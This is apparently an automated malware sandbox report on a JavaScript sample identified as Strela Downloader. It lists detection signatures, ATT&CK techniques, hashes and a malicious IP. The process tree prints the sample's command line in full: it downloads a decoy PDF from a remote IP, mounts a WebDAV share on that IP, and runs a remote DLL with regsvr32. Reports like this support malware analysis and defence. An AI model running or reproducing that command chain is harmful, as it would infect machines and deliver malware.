Windows
Analysis Report
1274513223711714673.js
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- wscript.exe (PID: 6400 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\12745 1322371171 4673.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 3548 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell.exe -C ommand "In voke-WebRe quest -Out File C:\Us ers\user\A ppData\Loc al\Temp\in voice.pdf http://193 .143.1.205 /invoice.p hp"&&start C:\Users\ user\AppDa ta\Local\T emp\invoic e.pdf&&cmd /c net us e \\193.14 3.1.205@88 88\davwwwr oot\&&cmd /c regsvr3 2 /s \\193 .143.1.205 @8888\davw wwroot\168 6958582989 9.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 1508 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 708 cmdline:
powershell .exe -Comm and "Invok e-WebReque st -OutFil e C:\Users \user\AppD ata\Local\ Temp\invoi ce.pdf htt p://193.14 3.1.205/in voice.php" MD5: 04029E121A0CFA5991749937DD22A1D9) - Acrobat.exe (PID: 6684 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user \AppData\L ocal\Temp\ invoice.pd f" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 5216 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 7320 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --user-d ata-dir="C :\Users\us er\AppData \Local\CEF \User Data " --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=21 28 --field -trial-han dle=1748,i ,801085282 0046009857 ,483282829 8872048800 ,131072 -- disable-fe atures=Bac kForwardCa che,Calcul ateNativeW inOcclusio n,WinUseBr owserSpell Checker /p refetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- svchost.exe (PID: 7184 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): |
Source: | Author: Florian Roth (Nextron Systems), Hieu Tran: |
Source: | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: vburov: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Click to jump to signature section
Software Vulnerabilities |
---|
Source: | Argument value : | Go to definition | ||
Source: | Argument value : | Go to definition |
Source: | Child: |
Source: | IP Address: | ||
Source: | IP Address: |
Source: | ASN Name: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Spam, unwanted Advertisements and Ransom Demands |
---|
Source: | File source: |
System Summary |
---|
Source: | COM Object queried: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | COM call: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 32 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 32 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 131 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 131 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 122 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
7% | Virustotal | Browse | ||
0% | ReversingLabs |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.143.1.205 | unknown | unknown | 57271 | BITWEB-ASRU | true |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1589050 |
Start date and time: | 2025-01-11 08:49:51 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 4m 59s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 16 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 1274513223711714673.js |
Detection: | MAL |
Classification: | mal100.rans.spyw.expl.evad.winJS@27/59@0/2 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
- Excluded IPs from analysis (whitelisted): 2.23.240.205, 52.6.155.20, 3.233.129.217, 52.22.41.97, 3.219.243.226, 2.16.168.105, 2.16.168.107, 162.159.61.3, 172.64.41.3, 184.28.90.27, 23.209.209.135, 23.200.0.33, 23.200.0.21, 192.168.2.4, 20.109.210.53, 104.77.220.172, 13.107.246.45
- Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, e16604.g.akamaiedge.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, crl.root-x1.letsencrypt.org.edgekey.net
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateFile calls found.
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description |
---|---|---|
02:50:48 | API Interceptor | |
02:50:52 | API Interceptor | |
02:50:52 | API Interceptor | |
02:51:05 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
193.143.1.205 | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
BITWEB-ASRU | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 1.307360922279285 |
Encrypted: | false |
SSDEEP: | 3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrF:KooCEYhgYEL0In |
MD5: | E8C6F5E5EFB24D4FF06960B72D39038F |
SHA1: | 38A3C0DA51D092A222FCC07EA70EB990F3DEFF2E |
SHA-256: | A56B7AAC09A7480F13B98F7A9BE10C6FCE924EF5829B6239D175232E5FC64526 |
SHA-512: | F4DCFC472DE739BE706C98C02DADCE328C6245B68FB57568D1774CBC7CAEC0A3BF68624D9610F35DC9279911C0E809D9DB81FB615F755FD9F3CF6BC8806576FE |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.4221084910669267 |
Encrypted: | false |
SSDEEP: | 1536:pSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:paza/vMUM2Uvz7DO |
MD5: | 9E1F8A34F2B36ED44D3468BCD387D6FA |
SHA1: | D6013361EC31F065C77C319EBB440372EA6BD28A |
SHA-256: | AF24722F0B325074EE42E3D748F61A594D335F37ECBB493BA1A9076E736AA3EE |
SHA-512: | 718A37B93EBB6430BF3753757DE4BE7FBDD85A4A69A4F6FB2D27CB4F367945565E3AC68F2F07B4D984D75F72F22AA0BCC123D62BB8E6D9ACEDE475D48DDD718B |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.076912108020167 |
Encrypted: | false |
SSDEEP: | 3:o/EYem9y+0hajn13a/6qNPIl/lAllcVO/lnlZMxZNQl:o8zuy+Ya53q6qVItlAOewk |
MD5: | 15FDA93BF59035BEA6209D524DF83F61 |
SHA1: | 573A47D17984E34778FBE95347A402B5CE02FBB9 |
